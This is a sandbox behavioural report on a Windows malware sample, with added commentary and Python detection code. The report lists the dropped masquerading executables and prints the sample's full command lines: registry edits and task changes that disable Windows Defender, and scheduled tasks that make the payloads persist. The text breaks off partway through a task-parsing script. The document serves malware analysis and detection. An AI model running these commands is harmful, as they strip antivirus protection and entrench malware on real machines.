| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FunCheker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FunCheker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
Executes dropped EXE
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\ModifiableWindowsApps\sihost.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\winlogon.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files (x86)\MSBuild\winlogon.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MSBuild\winlogon.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files (x86)\MSBuild\cc11b995f2a76d | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\cc11b995f2a76d | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\24dbde2999530e | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\088424020bedd6 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ja-JP\msedge.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\it-IT\msedge.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\it-IT\61a52ddc9dd915 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\InputMethod\SHARED\conhost.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\InputMethod\SHARED\088424020bedd6 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\ja-JP\msedge.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\ja-JP\61a52ddc9dd915 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\diagnostics\system\IESecurity\msedge.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| File created | C:\Windows\Performance\WinSAT\DataStore\38384e6a620884 | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1705699165-553239100-4129523827-1000\{03B65D90-6E45-4BD2-9E62-6DFEC28F04A9} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
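The run of reg.exe and schtasks.exe lines above is the Defender-tampering routine behind the "Modifies Windows Defender Real-time Protection settings" and "Modifies security service" signatures: the policy hive under HKLM\Software\Policies\Microsoft\Windows Defender is deleted and rewritten with every protection switched off, the two Defender ETW autologgers (DefenderApiLogger, DefenderAuditLogger) are set to Start=0, the Defender maintenance tasks are disabled, the SecurityHealth autorun and the EPP shell-extension entries are removed, and the WdBoot/WdFilter/WdNisDrv/WdNisSvc/WinDefend services are set to Start=4 (disabled). All of these are persistent registry and task state, so killing the processes alone leaves Defender off after the next reboot; on hosts with Tamper Protection enabled the policy values are ignored, which makes the presence of the commands, not their effect, the signal. The classifier below is an added example, not part of this report or of the sample; it tokenizes command lines of the shape shown here and maps each to a tamper category. The category names and the one benign HKCU\Software\ExampleApp control line are my own constructions.

```python
import re
from collections import Counter

# Constructed sample input: seven command lines copied verbatim from the
# process list above, plus one benign control (HKCU\Software\ExampleApp is
# made up for the negative case and does not appear in the report).
SAMPLE_CMDLINES = [
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
    r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg add "HKCU\Software\ExampleApp" /v "Theme" /t REG_DWORD /d "1" /f',
]

# Defender services and drivers touched by the sample; Start=4 means "disabled".
DEFENDER_SERVICES = {"wdboot", "wdfilter", "wdnisdrv", "wdnissvc", "windefend"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping "quoted runs" whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def switches(tokens):
    """Map each /switch to the token that follows it ('' for bare flags like /f)."""
    out = {}
    for i, tok in enumerate(tokens):
        if tok.startswith("/"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
            out[tok.lower()] = "" if nxt.startswith("/") else nxt
    return out


def classify(cmdline):
    """Return (category, detail) when the line tampers with Defender, else None."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    exe = tokens[0].lower().rsplit("\\", 1)[-1]
    exe = exe[:-4] if exe.endswith(".exe") else exe
    if exe == "reg" and len(tokens) >= 3:
        op, key, sw = tokens[1].lower(), tokens[2], switches(tokens)
        key_l, value, data = key.lower(), sw.get("/v", ""), sw.get("/d", "")
        detail = f"{op} {key}"
        if value:
            detail += f" {value}" + (f"={data}" if data else "")
        if r"policies\microsoft\windows defender" in key_l:
            return ("defender-policy-tamper", detail)
        if r"autologger\defender" in key_l and value.lower() == "start" and data == "0":
            return ("defender-etw-logger-disabled", detail)
        m = re.search(r"currentcontrolset\\services\\([^\\]+)$", key_l)
        if m and m.group(1) in DEFENDER_SERVICES and value.lower() == "start" and data == "4":
            return ("defender-service-disabled", detail)
        if op == "delete" and value.lower() == "securityhealth":
            return ("security-center-autorun-removed", detail)
        if op == "delete" and key_l.endswith(r"contextmenuhandlers\epp"):
            return ("defender-shell-extension-removed", detail)
        return None
    if exe == "schtasks":
        sw = switches(tokens)
        task = sw.get("/tn", "")
        if "/change" in sw and "/disable" in sw and re.search(r"windows defender|exploitguard", task, re.I):
            return ("defender-maintenance-task-disabled", f"disable {task}")
    return None


def triage(cmdlines):
    """Run the classifier over a batch; findings come back in input order."""
    return [hit for hit in (classify(line) for line in cmdlines) if hit]


def category_counts(cmdlines):
    """Per-category tally, handy for a one-line verdict on a process tree."""
    return Counter(cat for cat, _ in triage(cmdlines))


if __name__ == "__main__":
    for cat, detail in triage(SAMPLE_CMDLINES):
        print(f"{cat:38s} {detail}")
    print(dict(category_counts(SAMPLE_CMDLINES)))
```

The same tokenizer works on Sysmon Event ID 1 or 4688 CommandLine fields; the benign HKCU line is there to confirm that ordinary reg.exe use does not trip the rules, which only key on the Defender policy path, the Defender autologgers, the five Defender services, the SecurityHealth autorun and the EPP handler.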
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eTV455KIx4.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zlmto9DLwM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\timeout.exe
timeout /t 6 /nobreak
C:\Recovery\WindowsRE\SppExtComObj.exe
"C:\Recovery\WindowsRE\SppExtComObj.exe"
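The schtasks.exe /create bursts above are the persistence layer: each dropped copy gets one ONLOGON task plus one or two MINUTE tasks, all named after the system binary the copy impersonates (SppExtComObj.exe, SearchApp.exe, RuntimeBroker.exe, and further down services.exe, winlogon.exe, Idle.exe, sihost.exe and msedge.exe), but pointing into C:\Recovery\WindowsRE, C:\Users\Default\Cookies, C:\Windows\ja-JP and similar directories where those names never legitimately live. The repeated cmd.exe /C <random>.bat, then w32tm /stripchart /computer:localhost, then the payload, is the launcher loop, with w32tm used as a delay in place of a sleep. The parser below is an added example, not part of this report or of the sample; it extracts the task fields and flags three things a hunter cares about: a known system-binary name scheduled from outside its expected directory, a MINUTE schedule short enough to be a respawn loop, and /rl HIGHEST. The expected-directory table reflects a default Windows 10 install and is my assumption to tune per estate, and the Backup task line is a constructed benign control.

```python
import re

# Constructed sample input: five schtasks lines and one w32tm line copied
# verbatim from the process list above, plus one benign task I made up
# (C:\Program Files\ExampleBackup\backup.exe does not appear in the report).
SAMPLE_CMDLINES = [
    r"""schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f""",
    r"""schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /f""",
    r"""schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "Backup" /sc DAILY /st 02:00 /tr "C:\Program Files\ExampleBackup\backup.exe" /f""",
    r"""w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2""",
]

# Assumption: where each impersonated image lives on a default Windows 10 install.
# An empty tuple means the name has no on-disk image at all ("System Idle Process").
EXPECTED_DIRS = {
    "sppextcomobj.exe": (r"c:\windows\system32",),
    "runtimebroker.exe": (r"c:\windows\system32",),
    "services.exe": (r"c:\windows\system32",),
    "winlogon.exe": (r"c:\windows\system32",),
    "sihost.exe": (r"c:\windows\system32",),
    "searchapp.exe": (r"c:\windows\systemapps",),
    "msedge.exe": (r"c:\program files (x86)\microsoft\edge\application",
                   r"c:\program files\microsoft\edge\application"),
    "idle.exe": (),
}
SHORT_INTERVAL_MINUTES = 15  # anything at or below this looks like a respawn loop


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping "quoted runs" whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks_create(cmdline):
    """Return the task's fields, or None if this is not a 'schtasks /create' line."""
    tokens = tokenize(cmdline)
    if not tokens or tokens[0].lower().rsplit("\\", 1)[-1] not in ("schtasks", "schtasks.exe"):
        return None
    sw = {}
    for i, tok in enumerate(tokens[1:], start=1):
        if tok.startswith("/"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
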